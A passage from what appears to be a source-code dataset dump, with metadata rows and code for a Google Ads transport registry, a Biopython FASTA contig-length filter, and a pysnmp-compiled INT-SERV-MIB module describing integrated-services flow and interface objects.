channel_slug = None
if invoice.order and invoice.order.channel:
channel_slug = invoice.order.channel.slug
manager.notify(
NotifyEventType.INVOICE_READY, payload, channel_slug=channel_slug
)
manager.invoice_sent(invoice, invoice.order.get_customer_email())
| true
| true
|
790aff716ab055d6948c46123148d87a7e4705e8
| 1,069
|
py
|
Python
|
google/ads/googleads/v8/services/services/hotel_group_view_service/transports/__init__.py
|
wxxlouisa/google-ads-python
|
f24137966f6bfcb765a9b1fae79f2d23041825fe
|
[
"Apache-2.0"
] | 285
|
2018-10-05T16:47:58.000Z
|
2022-03-31T00:58:39.000Z
|
google/ads/googleads/v8/services/services/hotel_group_view_service/transports/__init__.py
|
wxxlouisa/google-ads-python
|
f24137966f6bfcb765a9b1fae79f2d23041825fe
|
[
"Apache-2.0"
] | 425
|
2018-09-10T13:32:41.000Z
|
2022-03-31T14:50:05.000Z
|
google/ads/googleads/v8/services/services/hotel_group_view_service/transports/__init__.py
|
wxxlouisa/google-ads-python
|
f24137966f6bfcb765a9b1fae79f2d23041825fe
|
[
"Apache-2.0"
] | 369
|
2018-11-28T07:01:00.000Z
|
2022-03-28T09:53:22.000Z
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
from typing import Dict, Type
from .base import HotelGroupViewServiceTransport
from .grpc import HotelGroupViewServiceGrpcTransport
# Compile a registry of transports.
_transport_registry = (
OrderedDict()
) # type: Dict[str, Type[HotelGroupViewServiceTransport]]
_transport_registry["grpc"] = HotelGroupViewServiceGrpcTransport
__all__ = (
"HotelGroupViewServiceTransport",
"HotelGroupViewServiceGrpcTransport",
)
| 31.441176
| 74
| 0.77362
|
from collections import OrderedDict
from typing import Dict, Type
from .base import HotelGroupViewServiceTransport
from .grpc import HotelGroupViewServiceGrpcTransport
_transport_registry = (
OrderedDict()
)
_transport_registry["grpc"] = HotelGroupViewServiceGrpcTransport
__all__ = (
"HotelGroupViewServiceTransport",
"HotelGroupViewServiceGrpcTransport",
)
| true
| true
|
790aff9d5310c04a944f7830aa3dbdbd7daeda78
| 467
|
py
|
Python
|
filter_contigs.py
|
MullinsLab/HHV8-assembly-SPades
|
74f5853bd1e7c1af7f306343ebcd9ac919fda92f
|
[
"MIT"
] | 7
|
2016-10-05T23:43:33.000Z
|
2021-07-06T18:36:41.000Z
|
filter_contigs.py
|
MullinsLab/HHV8-assembly-SPades
|
74f5853bd1e7c1af7f306343ebcd9ac919fda92f
|
[
"MIT"
] | 1
|
2015-11-25T07:14:24.000Z
|
2016-01-28T15:07:41.000Z
|
filter_contigs.py
|
MullinsLab/HHV8-assembly-SPades
|
74f5853bd1e7c1af7f306343ebcd9ac919fda92f
|
[
"MIT"
] | 4
|
2016-10-11T17:34:51.000Z
|
2020-03-16T14:26:36.000Z
|
#!/usr/bin/env python
import sys
from Bio import SeqIO
min_length, fasta_file_path = sys.argv[1:]
with open(fasta_file_path.replace('fa', 'filter{}.fa'.format(min_length)), 'w') as filtered_fasta:
with open(fasta_file_path, 'rU') as input_fasta:
def filtered_contigs_generator(min):
for contig in SeqIO.parse(input_fasta, 'fasta'):
if len(contig) >= min:
yield contig
SeqIO.write(filtered_contigs_generator(int(min_length)), filtered_fasta, 'fasta')
| 38.916667
| 98
| 0.745182
|
import sys
from Bio import SeqIO
min_length, fasta_file_path = sys.argv[1:]
with open(fasta_file_path.replace('fa', 'filter{}.fa'.format(min_length)), 'w') as filtered_fasta:
with open(fasta_file_path, 'rU') as input_fasta:
def filtered_contigs_generator(min):
for contig in SeqIO.parse(input_fasta, 'fasta'):
if len(contig) >= min:
yield contig
SeqIO.write(filtered_contigs_generator(int(min_length)), filtered_fasta, 'fasta')
| true
| true
|
790affc4694b91c99c2711674937cfa282c5fc8f
| 25,716
|
py
|
Python
|
pysnmp-with-texts/INT-SERV-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 8
|
2019-05-09T17:04:00.000Z
|
2021-06-09T06:50:51.000Z
|
pysnmp-with-texts/INT-SERV-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 4
|
2019-05-31T16:42:59.000Z
|
2020-01-31T21:57:17.000Z
|
pysnmp-with-texts/INT-SERV-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 10
|
2019-04-30T05:51:36.000Z
|
2022-02-16T03:33:41.000Z
|
#
# PySNMP MIB module INT-SERV-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/INT-SERV-MIB
# Produced by pysmi-0.3.4 at Wed May 1 12:18:45 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
ObjectIdentifier, OctetString, Integer = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "OctetString", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, ConstraintsUnion, SingleValueConstraint, ConstraintsIntersection, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "ConstraintsUnion", "SingleValueConstraint", "ConstraintsIntersection", "ValueSizeConstraint")
InterfaceIndex, ifIndex = mibBuilder.importSymbols("IF-MIB", "InterfaceIndex", "ifIndex")
ModuleCompliance, ObjectGroup, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "ObjectGroup", "NotificationGroup")
MibScalar, MibTable, MibTableRow, MibTableColumn, Counter64, Counter32, IpAddress, ModuleIdentity, Unsigned32, MibIdentifier, NotificationType, Integer32, TimeTicks, Bits, mib_2, iso, Gauge32, ObjectIdentity = mibBuilder.importSymbols("SNMPv2-SMI", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Counter64", "Counter32", "IpAddress", "ModuleIdentity", "Unsigned32", "MibIdentifier", "NotificationType", "Integer32", "TimeTicks", "Bits", "mib-2", "iso", "Gauge32", "ObjectIdentity")
DisplayString, TruthValue, RowStatus, TestAndIncr, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TruthValue", "RowStatus", "TestAndIncr", "TextualConvention")
intSrv = ModuleIdentity((1, 3, 6, 1, 2, 1, 52))
if mibBuilder.loadTexts: intSrv.setLastUpdated('9710030642Z')
if mibBuilder.loadTexts: intSrv.setOrganization('IETF Integrated Services Working Group')
if mibBuilder.loadTexts: intSrv.setContactInfo(' Fred Baker Postal: Cisco Systems 519 Lado Drive Santa Barbara, California 93111 Tel: +1 805 681 0115 E-Mail: fred@cisco.com John Krawczyk Postal: ArrowPoint Communications 235 Littleton Road Westford, Massachusetts 01886 Tel: +1 508 692 5875 E-Mail: jjk@tiac.net')
if mibBuilder.loadTexts: intSrv.setDescription('The MIB module to describe the Integrated Services Protocol')
intSrvObjects = MibIdentifier((1, 3, 6, 1, 2, 1, 52, 1))
intSrvGenObjects = MibIdentifier((1, 3, 6, 1, 2, 1, 52, 2))
intSrvNotifications = MibIdentifier((1, 3, 6, 1, 2, 1, 52, 3))
intSrvConformance = MibIdentifier((1, 3, 6, 1, 2, 1, 52, 4))
class SessionNumber(TextualConvention, Integer32):
description = 'The Session Number convention is used for numbers identifying sessions or saved PATH or RESV information. It is a number in the range returned by a TestAndIncr variable, having no protocol meaning whatsoever but serving instead as simple identifier. The alternative was a very complex instance or instance object that became unwieldy.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(0, 2147483647)
class Protocol(TextualConvention, Integer32):
description = 'The value of the IP Protocol field of an IP Datagram Header. This identifies the protocol layer above IP. For example, the value 6 is used for TCP and the value 17 is used for UDP. The values of this field are defined in the As- signed Numbers RFC.'
status = 'current'
displayHint = 'd'
subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(1, 255)
class SessionType(TextualConvention, Integer32):
description = "The value of the C-Type field of a Session ob- ject, as defined in the RSVP specification. This value determines the lengths of octet strings and use of certain objects such as the 'port' variables. If the C-Type calls for an IP6 address, one would expect all source, des- tination, and next/previous hop addresses to be 16 bytes long, and for the ports to be UDP/TCP port numbers, for example."
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(1, 255)
class Port(TextualConvention, OctetString):
description = 'The value of the UDP or TCP Source or Destina- tion Port field, a virtual destination port or generalized port identifier used with the IPSEC Authentication Header or Encapsulating Security Payload, or other session discriminator. If it is not used, the value should be of length 0. This pair, when coupled with the IP Addresses of the source and destination system and the IP protocol field, uniquely identifies a data stream.'
status = 'current'
displayHint = 'd'
subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(2, 4)
class MessageSize(TextualConvention, Integer32):
description = 'The size of a message in bytes. This is used to specify the minimum and maximum size of a message along an integrated services route.'
status = 'current'
displayHint = 'd'
subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(0, 2147483647)
class BitRate(TextualConvention, Integer32):
description = 'The rate, in bits/second, that data may move in the context. Applicable contexts minimally include the speed of an interface or virtual circuit, the data rate of a (potentially aggre- gated) data flow, or the data rate to be allo- cated for use by a flow.'
status = 'current'
displayHint = 'd'
subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(0, 2147483647)
class BurstSize(TextualConvention, Integer32):
description = 'The number of octets of IP Data, including IP Headers, that a stream may send without concern for policing.'
status = 'current'
displayHint = 'd'
subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(0, 2147483647)
class QosService(TextualConvention, Integer32):
description = 'The class of service in use by a flow.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 5))
namedValues = NamedValues(("bestEffort", 1), ("guaranteedDelay", 2), ("controlledLoad", 5))
intSrvIfAttribTable = MibTable((1, 3, 6, 1, 2, 1, 52, 1, 1), )
if mibBuilder.loadTexts: intSrvIfAttribTable.setStatus('current')
if mibBuilder.loadTexts: intSrvIfAttribTable.setDescription("The reservable attributes of the system's in- terfaces.")
intSrvIfAttribEntry = MibTableRow((1, 3, 6, 1, 2, 1, 52, 1, 1, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"))
if mibBuilder.loadTexts: intSrvIfAttribEntry.setStatus('current')
if mibBuilder.loadTexts: intSrvIfAttribEntry.setDescription('The reservable attributes of a given inter- face.')
intSrvIfAttribAllocatedBits = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 1, 1, 1), BitRate()).setUnits('Bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: intSrvIfAttribAllocatedBits.setStatus('current')
if mibBuilder.loadTexts: intSrvIfAttribAllocatedBits.setDescription('The number of bits/second currently allocated to reserved sessions on the interface.')
intSrvIfAttribMaxAllocatedBits = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 1, 1, 2), BitRate()).setUnits('Bits per second').setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvIfAttribMaxAllocatedBits.setStatus('current')
if mibBuilder.loadTexts: intSrvIfAttribMaxAllocatedBits.setDescription('The maximum number of bits/second that may be allocated to reserved sessions on the inter- face.')
intSrvIfAttribAllocatedBuffer = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 1, 1, 3), BurstSize()).setUnits('Bytes').setMaxAccess("readonly")
if mibBuilder.loadTexts: intSrvIfAttribAllocatedBuffer.setStatus('current')
if mibBuilder.loadTexts: intSrvIfAttribAllocatedBuffer.setDescription('The amount of buffer space required to hold the simultaneous burst of all reserved flows on the interface.')
intSrvIfAttribFlows = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 1, 1, 4), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: intSrvIfAttribFlows.setStatus('current')
if mibBuilder.loadTexts: intSrvIfAttribFlows.setDescription('The number of reserved flows currently active on this interface. A flow can be created ei- ther from a reservation protocol (such as RSVP or ST-II) or via configuration information.')
intSrvIfAttribPropagationDelay = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 1, 1, 5), Integer32()).setUnits('microseconds').setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvIfAttribPropagationDelay.setStatus('current')
if mibBuilder.loadTexts: intSrvIfAttribPropagationDelay.setDescription('The amount of propagation delay that this in- terface introduces in addition to that intro- diced by bit propagation delays.')
intSrvIfAttribStatus = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 1, 1, 6), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvIfAttribStatus.setStatus('current')
if mibBuilder.loadTexts: intSrvIfAttribStatus.setDescription("'active' on interfaces that are configured for RSVP.")
intSrvFlowTable = MibTable((1, 3, 6, 1, 2, 1, 52, 1, 2), )
if mibBuilder.loadTexts: intSrvFlowTable.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowTable.setDescription("Information describing the reserved flows us- ing the system's interfaces.")
intSrvFlowEntry = MibTableRow((1, 3, 6, 1, 2, 1, 52, 1, 2, 1), ).setIndexNames((0, "INT-SERV-MIB", "intSrvFlowNumber"))
if mibBuilder.loadTexts: intSrvFlowEntry.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowEntry.setDescription('Information describing the use of a given in- terface by a given flow. The counter intSrvFlowPoliced starts counting at the in- stallation of the flow.')
intSrvFlowNumber = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 1), SessionNumber())
if mibBuilder.loadTexts: intSrvFlowNumber.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowNumber.setDescription('The number of this flow. This is for SNMP In- dexing purposes only and has no relation to any protocol value.')
intSrvFlowType = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 2), SessionType()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowType.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowType.setDescription('The type of session (IP4, IP6, IP6 with flow information, etc).')
intSrvFlowOwner = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("rsvp", 2), ("management", 3)))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowOwner.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowOwner.setDescription('The process that installed this flow in the queue policy database.')
intSrvFlowDestAddr = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 4), OctetString().subtype(subtypeSpec=ValueSizeConstraint(4, 16))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowDestAddr.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowDestAddr.setDescription("The destination address used by all senders in this session. This object may not be changed when the value of the RowStatus object is 'ac- tive'.")
intSrvFlowSenderAddr = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 5), OctetString().subtype(subtypeSpec=ValueSizeConstraint(4, 16))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowSenderAddr.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowSenderAddr.setDescription("The source address of the sender selected by this reservation. The value of all zeroes in- dicates 'all senders'. This object may not be changed when the value of the RowStatus object is 'active'.")
intSrvFlowDestAddrLength = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 128))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowDestAddrLength.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowDestAddrLength.setDescription("The length of the destination address in bits. This is the CIDR Prefix Length, which for IP4 hosts and multicast addresses is 32 bits. This object may not be changed when the value of the RowStatus object is 'active'.")
intSrvFlowSenderAddrLength = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 128))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowSenderAddrLength.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowSenderAddrLength.setDescription("The length of the sender's address in bits. This is the CIDR Prefix Length, which for IP4 hosts and multicast addresses is 32 bits. This object may not be changed when the value of the RowStatus object is 'active'.")
intSrvFlowProtocol = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 8), Protocol()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowProtocol.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowProtocol.setDescription("The IP Protocol used by a session. This ob- ject may not be changed when the value of the RowStatus object is 'active'.")
intSrvFlowDestPort = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 9), Port()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowDestPort.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowDestPort.setDescription("The UDP or TCP port number used as a destina- tion port for all senders in this session. If the IP protocol in use, specified by intSrvResvFwdProtocol, is 50 (ESP) or 51 (AH), this represents a virtual destination port number. A value of zero indicates that the IP protocol in use does not have ports. This ob- ject may not be changed when the value of the RowStatus object is 'active'.")
intSrvFlowPort = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 10), Port()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowPort.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowPort.setDescription("The UDP or TCP port number used as a source port for this sender in this session. If the IP protocol in use, specified by intSrvResvFwdProtocol is 50 (ESP) or 51 (AH), this represents a generalized port identifier (GPI). A value of zero indicates that the IP protocol in use does not have ports. This ob- ject may not be changed when the value of the RowStatus object is 'active'.")
intSrvFlowFlowId = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 16777215))).setMaxAccess("readonly")
if mibBuilder.loadTexts: intSrvFlowFlowId.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowFlowId.setDescription('The flow ID that this sender is using, if this is an IPv6 session.')
intSrvFlowInterface = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 12), InterfaceIndex()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowInterface.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowInterface.setDescription('The ifIndex value of the interface on which this reservation exists.')
intSrvFlowIfAddr = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 13), OctetString().subtype(subtypeSpec=ValueSizeConstraint(4, 16))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowIfAddr.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowIfAddr.setDescription('The IP Address on the ifEntry on which this reservation exists. This is present primarily to support those interfaces which layer multi- ple IP Addresses on the interface.')
intSrvFlowRate = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 14), BitRate()).setUnits('bits per second').setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowRate.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowRate.setDescription("The Reserved Rate of the sender's data stream. If this is a Controlled Load service flow, this rate is derived from the Tspec rate parameter (r). If this is a Guaranteed service flow, this rate is derived from the Rspec clearing rate parameter (R).")
intSrvFlowBurst = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 15), BurstSize()).setUnits('bytes').setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowBurst.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowBurst.setDescription("The size of the largest burst expected from the sender at a time. If this is less than the sender's advertised burst size, the receiver is asking the network to provide flow pacing beyond what would be provided under normal circumstances. Such pac- ing is at the network's option.")
intSrvFlowWeight = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 16), Integer32()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowWeight.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowWeight.setDescription('The weight used to prioritize the traffic. Note that the interpretation of this object is implementation-specific, as implementations vary in their use of weighting procedures.')
intSrvFlowQueue = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 17), Integer32()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowQueue.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowQueue.setDescription('The number of the queue used by this traffic. Note that the interpretation of this object is implementation-specific, as implementations vary in their use of queue identifiers.')
intSrvFlowMinTU = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 18), MessageSize()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowMinTU.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowMinTU.setDescription('The minimum message size for this flow. The policing algorithm will treat smaller messages as though they are this size.')
intSrvFlowMaxTU = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 19), MessageSize()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowMaxTU.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowMaxTU.setDescription('The maximum datagram size for this flow that will conform to the traffic specification. This value cannot exceed the MTU of the interface.')
intSrvFlowBestEffort = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 20), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: intSrvFlowBestEffort.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowBestEffort.setDescription('The number of packets that were remanded to best effort service.')
intSrvFlowPoliced = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 21), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: intSrvFlowPoliced.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowPoliced.setDescription("The number of packets policed since the incep- tion of the flow's service.")
intSrvFlowDiscard = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 22), TruthValue().clone('false')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowDiscard.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowDiscard.setDescription("If 'true', the flow is to incur loss when traffic is policed. If 'false', policed traff- ic is treated as best effort traffic.")
intSrvFlowService = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 23), QosService()).setMaxAccess("readonly")
if mibBuilder.loadTexts: intSrvFlowService.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowService.setDescription('The QoS service being applied to this flow.')
intSrvFlowOrder = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 24), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowOrder.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowOrder.setDescription('In the event of ambiguity, the order in which the classifier should make its comparisons. The row with intSrvFlowOrder=0 is tried first, and comparisons proceed in the order of in- creasing value. Non-serial implementations of the classifier should emulate this behavior.')
intSrvFlowStatus = MibTableColumn((1, 3, 6, 1, 2, 1, 52, 1, 2, 1, 25), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: intSrvFlowStatus.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowStatus.setDescription("'active' for all active flows. This object may be used to install static classifier infor- mation, delete classifier information, or au- thorize such.")
intSrvFlowNewIndex = MibScalar((1, 3, 6, 1, 2, 1, 52, 2, 1), TestAndIncr()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: intSrvFlowNewIndex.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowNewIndex.setDescription("This object is used to assign values to intSrvFlowNumber as described in 'Textual Con- ventions for SNMPv2'. The network manager reads the object, and then writes the value back in the SET that creates a new instance of intSrvFlowEntry. If the SET fails with the code 'inconsistentValue', then the process must be repeated; If the SET succeeds, then the ob- ject is incremented, and the new instance is created according to the manager's directions.")
intSrvGroups = MibIdentifier((1, 3, 6, 1, 2, 1, 52, 4, 1))
intSrvCompliances = MibIdentifier((1, 3, 6, 1, 2, 1, 52, 4, 2))
intSrvCompliance = ModuleCompliance((1, 3, 6, 1, 2, 1, 52, 4, 2, 1)).setObjects(("INT-SERV-MIB", "intSrvIfAttribGroup"), ("INT-SERV-MIB", "intSrvFlowsGroup"), ("INT-SERV-MIB", "intSrvGenObjectsGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
intSrvCompliance = intSrvCompliance.setStatus('current')
if mibBuilder.loadTexts: intSrvCompliance.setDescription('The compliance statement ')
intSrvIfAttribGroup = ObjectGroup((1, 3, 6, 1, 2, 1, 52, 4, 1, 1)).setObjects(("INT-SERV-MIB", "intSrvIfAttribAllocatedBits"), ("INT-SERV-MIB", "intSrvIfAttribMaxAllocatedBits"), ("INT-SERV-MIB", "intSrvIfAttribAllocatedBuffer"), ("INT-SERV-MIB", "intSrvIfAttribFlows"), ("INT-SERV-MIB", "intSrvIfAttribPropagationDelay"), ("INT-SERV-MIB", "intSrvIfAttribStatus"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
intSrvIfAttribGroup = intSrvIfAttribGroup.setStatus('current')
if mibBuilder.loadTexts: intSrvIfAttribGroup.setDescription('These objects are required for Systems sup- porting the Integrated Services Architecture.')
intSrvFlowsGroup = ObjectGroup((1, 3, 6, 1, 2, 1, 52, 4, 1, 2)).setObjects(("INT-SERV-MIB", "intSrvFlowType"), ("INT-SERV-MIB", "intSrvFlowOwner"), ("INT-SERV-MIB", "intSrvFlowDestAddr"), ("INT-SERV-MIB", "intSrvFlowSenderAddr"), ("INT-SERV-MIB", "intSrvFlowDestAddrLength"), ("INT-SERV-MIB", "intSrvFlowSenderAddrLength"), ("INT-SERV-MIB", "intSrvFlowProtocol"), ("INT-SERV-MIB", "intSrvFlowDestPort"), ("INT-SERV-MIB", "intSrvFlowPort"), ("INT-SERV-MIB", "intSrvFlowFlowId"), ("INT-SERV-MIB", "intSrvFlowInterface"), ("INT-SERV-MIB", "intSrvFlowBestEffort"), ("INT-SERV-MIB", "intSrvFlowRate"), ("INT-SERV-MIB", "intSrvFlowBurst"), ("INT-SERV-MIB", "intSrvFlowWeight"), ("INT-SERV-MIB", "intSrvFlowQueue"), ("INT-SERV-MIB", "intSrvFlowMinTU"), ("INT-SERV-MIB", "intSrvFlowMaxTU"), ("INT-SERV-MIB", "intSrvFlowDiscard"), ("INT-SERV-MIB", "intSrvFlowPoliced"), ("INT-SERV-MIB", "intSrvFlowService"), ("INT-SERV-MIB", "intSrvFlowIfAddr"), ("INT-SERV-MIB", "intSrvFlowOrder"), ("INT-SERV-MIB", "intSrvFlowStatus"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
intSrvFlowsGroup = intSrvFlowsGroup.setStatus('current')
if mibBuilder.loadTexts: intSrvFlowsGroup.setDescription('These objects are required for Systems sup- porting the Integrated Services Architecture.')
intSrvGenObjectsGroup = ObjectGroup((1, 3, 6, 1, 2, 1, 52, 4, 1, 3)).setObjects(("INT-SERV-MIB", "intSrvFlowNewIndex"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
intSrvGenObjectsGroup = intSrvGenObjectsGroup.setStatus('current')
if mibBuilder.loadTexts: intSrvGenObjectsGroup.setDescription('These objects are required for Systems sup- porting the Integrated Services Architecture.')
mibBuilder.exportSymbols("INT-SERV-MIB", BitRate=BitRate, intSrvIfAttribAllocatedBits=intSrvIfAttribAllocatedBits, intSrvFlowMaxTU=intSrvFlowMaxTU, intSrvFlowOrder=intSrvFlowOrder, PYSNMP_MODULE_ID=intSrv, Protocol=Protocol, intSrvIfAttribAllocatedBuffer=intSrvIfAttribAllocatedBuffer, intSrvFlowDestAddr=intSrvFlowDestAddr, intSrvFlowBurst=intSrvFlowBurst, intSrvIfAttribFlows=intSrvIfAttribFlows, intSrvFlowTable=intSrvFlowTable, intSrvFlowEntry=intSrvFlowEntry, intSrvFlowSenderAddrLength=intSrvFlowSenderAddrLength, intSrvIfAttribGroup=intSrvIfAttribGroup, intSrvFlowInterface=intSrvFlowInterface, intSrvFlowDestAddrLength=intSrvFlowDestAddrLength, intSrvFlowDestPort=intSrvFlowDestPort, BurstSize=BurstSize, intSrvFlowStatus=intSrvFlowStatus, intSrvIfAttribMaxAllocatedBits=intSrvIfAttribMaxAllocatedBits, intSrvFlowNewIndex=intSrvFlowNewIndex, intSrvGroups=intSrvGroups, MessageSize=MessageSize, intSrvFlowRate=intSrvFlowRate, intSrvFlowPort=intSrvFlowPort, intSrvFlowIfAddr=intSrvFlowIfAddr, SessionType=SessionType, intSrvIfAttribTable=intSrvIfAttribTable, intSrvIfAttribPropagationDelay=intSrvIfAttribPropagationDelay, intSrvFlowService=intSrvFlowService, intSrvFlowsGroup=intSrvFlowsGroup, intSrvFlowWeight=intSrvFlowWeight, intSrvFlowMinTU=intSrvFlowMinTU, intSrvFlowProtocol=intSrvFlowProtocol, intSrvFlowOwner=intSrvFlowOwner, intSrvIfAttribEntry=intSrvIfAttribEntry, intSrvFlowSenderAddr=intSrvFlowSenderAddr, QosService=QosService, SessionNumber=SessionNumber, intSrvObjects=intSrvObjects, intSrvGenObjects=intSrvGenObjects, 